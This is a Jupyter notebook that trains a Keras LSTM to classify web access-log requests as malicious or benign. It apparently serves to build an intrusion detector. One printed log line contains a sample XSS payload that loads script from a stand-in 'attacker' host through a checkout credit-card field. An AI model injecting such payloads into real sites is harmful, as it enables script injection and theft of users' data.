In [1]:
import sys
import os
import json
import pandas
import numpy
import optparse
from keras.callbacks import TensorBoard
from keras.models import Sequential
from keras.layers import LSTM, Dense, Dropout
from keras.layers.embeddings import Embedding
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
from collections import OrderedDict

Using TensorFlow backend.


In [2]:
# Load the access-log CSV. The file has no header row and uses '|' as its
# quote character, so each JSON log string is read as a single field.
dataframe = pandas.read_csv(
    './data/dev-access.csv',
    engine='python',
    quotechar='|',
    header=None,
)

In [3]:
# Preview the first 10 rows of the loaded frame.
dataframe.head(10)

Unnamed: 0,0,1
0,"{""timestamp"":1502738402847,""method"":""post"",""qu...",0
1,"{""timestamp"":1502738402849,""method"":""post"",""qu...",0
2,"{""timestamp"":1502738402852,""method"":""post"",""qu...",0
3,"{""timestamp"":1502738402852,""method"":""post"",""qu...",0
4,"{""timestamp"":1502738402853,""method"":""post"",""qu...",0
5,"{""timestamp"":1502738402853,""method"":""post"",""qu...",0
6,"{""timestamp"":1502738402854,""method"":""post"",""qu...",0
7,"{""timestamp"":1502738402855,""method"":""post"",""qu...",0
8,"{""timestamp"":1502738402856,""method"":""post"",""qu...",0
9,"{""timestamp"":1502738402856,""method"":""post"",""qu...",0


In [4]:
# Shuffle every row (frac=1) and convert to a NumPy array. The train/test
# split further down is purely positional, so the row order decides which
# samples land in each split. A fixed random_state makes that shuffle, and
# therefore the split, repeatable across kernel restarts.
dataset = dataframe.sample(frac=1, random_state=42).values

In [6]:
# Display the shuffled array.
dataset

array([[ '{"timestamp":1502738457546,"method":"get","query":{"query":"gurab"},"path":"/search","statusCode":404,"source":{"remoteAddress":"71.50.161.224"},"route":"/search","headers":{"host":"localhost:8002","connection":"keep-alive","cache-control":"no-cache","accept":"*/*","accept-encoding":"gzip, deflate, br","accept-language":"en-US,en;q=0.8,es;q=0.6"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not Found","message":"Not Found"}}',
        0],
       [ '{"timestamp":1502738433086,"method":"get","query":{"query":"zopup"},"path":"/search","statusCode":404,"source":{"remoteAddress":"133.73.53.176","referer":"http://localhost:8002/enter"},"route":"/search","headers":{"host":"localhost:8002","accept-language":"en-us","accept-encoding":"gzip, deflate","connection":"keep-alive","accept":"*/*","referer":"http://localhost:8002/enter","cache-control":"no-cache","x-requested-with":"XMLHttpRequest"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not F

In [8]:
# Preprocess dataset
X = dataset[:,0]
Y = dataset[:,1]

In [9]:
# Inspect the raw log strings taken from column 0.
X

array([ '{"timestamp":1502738457546,"method":"get","query":{"query":"gurab"},"path":"/search","statusCode":404,"source":{"remoteAddress":"71.50.161.224"},"route":"/search","headers":{"host":"localhost:8002","connection":"keep-alive","cache-control":"no-cache","accept":"*/*","accept-encoding":"gzip, deflate, br","accept-language":"en-US,en;q=0.8,es;q=0.6"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not Found","message":"Not Found"}}',
       '{"timestamp":1502738433086,"method":"get","query":{"query":"zopup"},"path":"/search","statusCode":404,"source":{"remoteAddress":"133.73.53.176","referer":"http://localhost:8002/enter"},"route":"/search","headers":{"host":"localhost:8002","accept-language":"en-us","accept-encoding":"gzip, deflate","connection":"keep-alive","accept":"*/*","referer":"http://localhost:8002/enter","cache-control":"no-cache","x-requested-with":"XMLHttpRequest"},"requestPayload":null,"responsePayload":{"statusCode":404,"error":"Not Found","message"

In [10]:
# Inspect the target values taken from column 1.
Y

array([0, 0, 1, ..., 1, 0, 0], dtype=object)

In [11]:
# Reduce every log entry to the fields used for modelling: parse the JSON,
# drop the keys listed below, and re-serialise it compactly (no whitespace
# after ',' or ':'). OrderedDict keeps the remaining keys in their original
# order, so the character sequence seen by the tokenizer is stable.
fields_to_drop = ('timestamp', 'headers', 'source', 'route', 'responsePayload')

for index, item in enumerate(X):
    reqJson = json.loads(item, object_pairs_hook=OrderedDict)
    for field in fields_to_drop:
        # pop() with a default tolerates entries that lack a field, where
        # `del` would abort the whole loop with KeyError. Because X is
        # rewritten in place, this also keeps the cell safe to re-run.
        reqJson.pop(field, None)
    X[index] = json.dumps(reqJson, separators=(',', ':'))

In [12]:
# Inspect the log strings after the unwanted fields have been removed.
X

array([ '{"method":"get","query":{"query":"gurab"},"path":"/search","statusCode":404,"requestPayload":null}',
       '{"method":"get","query":{"query":"zopup"},"path":"/search","statusCode":404,"requestPayload":null}',
       '{"method":"post","query":{},"path":"/checkout","statusCode":400,"requestPayload":{"creditCard":"<script src=\\"http://attacker/malicious\\u2011script.js\\"></script>"}}',
       ...,
       '{"method":"get","query":{},"path":"/administrator/admin/","statusCode":404,"requestPayload":null}',
       '{"method":"get","query":{"query":"Slippers"},"path":"/search","statusCode":200,"requestPayload":null}',
       '{"method":"get","query":{"query":"Men\'s"},"path":"/search","statusCode":200,"requestPayload":null}'], dtype=object)

In [14]:
# Character-level tokenizer. The filter list is limited to tab and newline,
# overriding the Tokenizer's default filter set.
tokenizer = Tokenizer(
    filters='\t\n',
    char_level=True,
)
# Build the character index from the cleaned log strings.
tokenizer.fit_on_texts(X)

In [15]:
# Extract and save word dictionary
# The tokenizer's token-to-index mapping is written out as JSON so the same
# encoding can be reloaded outside this notebook.
word_dict_file = 'build/word-dictionary.json'
word_dict_dir = os.path.dirname(word_dict_file)

# Create the output directory on first use.
if not os.path.exists(word_dict_dir):
    os.makedirs(word_dict_dir)

with open(word_dict_file, 'w') as outfile:
    json.dump(tokenizer.word_index, outfile, ensure_ascii=False)

In [16]:
# Embedding vocabulary size: number of indexed tokens plus one
# (presumably because index 0 is reserved for padding; confirm against the Keras docs).
num_words = 1 + len(tokenizer.word_index)
# Replace each log string with its list of token indices.
X = tokenizer.texts_to_sequences(X)

# Fixed sequence length used when padding, and the number of rows
# (75% of the dataset) that go into the training split.
max_log_length = 1024
train_size = int(0.75 * len(dataset))

In [17]:
# Bring every sequence to exactly max_log_length entries.
X_processed = sequence.pad_sequences(X, maxlen=max_log_length)

# Positional split: the first train_size rows train the model, the rest are held out.
X_train = X_processed[:train_size]
X_test = X_processed[train_size:]
Y_train = Y[:train_size]
Y_test = Y[train_size:]

In [18]:
# TensorBoard callback: event files are written under ./logs, with
# embeddings_freq set to 1.
tb_callback = TensorBoard(
    log_dir='./logs',
    embeddings_freq=1,
)

In [19]:
# Binary classifier over character sequences:
# embedding -> dropout -> LSTM -> dropout -> single sigmoid unit.
model = Sequential([
    Embedding(num_words, 32, input_length=max_log_length),
    Dropout(0.5),
    LSTM(64, recurrent_dropout=0.5),
    Dropout(0.5),
    Dense(1, activation='sigmoid'),
])
model.compile(
    loss='binary_crossentropy',
    optimizer='adam',
    metrics=['accuracy'],
)

In [20]:
# summary() prints the layer table itself and returns None, so wrapping it in
# print() only appended a stray "None" line to the cell output.
model.summary()

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
embedding_1 (Embedding)      (None, 1024, 32)          2816      
_________________________________________________________________
dropout_1 (Dropout)          (None, 1024, 32)          0         
_________________________________________________________________
lstm_1 (LSTM)                (None, 64)                24832     
_________________________________________________________________
dropout_2 (Dropout)          (None, 64)                0         
_________________________________________________________________
dense_1 (Dense)              (None, 1)                 65        
Total params: 27,713
Trainable params: 27,713
Non-trainable params: 0
_________________________________________________________________
None


In [21]:
# Train for 3 epochs in batches of 128, with validation_split=0.25 and
# training progress logged through the TensorBoard callback.
model.fit(
    X_train,
    Y_train,
    validation_split=0.25,
    epochs=3,
    batch_size=128,
    callbacks=[tb_callback],
)

Train on 15059 samples, validate on 5020 samples
Epoch 1/3
Epoch 2/3
Epoch 3/3


<keras.callbacks.History at 0x105bc9750>

In [22]:
# Evaluate model
# Score the trained network on the held-out test split and report accuracy
# as a percentage.
score, acc = model.evaluate(
    X_test,
    Y_test,
    verbose=1,
    batch_size=128,
)
print("Model Accuracy: {:0.2f}%".format(100 * acc))

Model Accuracy: 98.80%


In [23]:
# Save model
# Three artefacts are written: the weights alone, the full model, and the
# architecture as JSON.
model.save_weights('securitai-lstm-weights.h5')
model.save('securitai-lstm-model.h5')

with open('securitai-lstm-model.json', 'w') as outfile:
    architecture_json = model.to_json()
    outfile.write(architecture_json)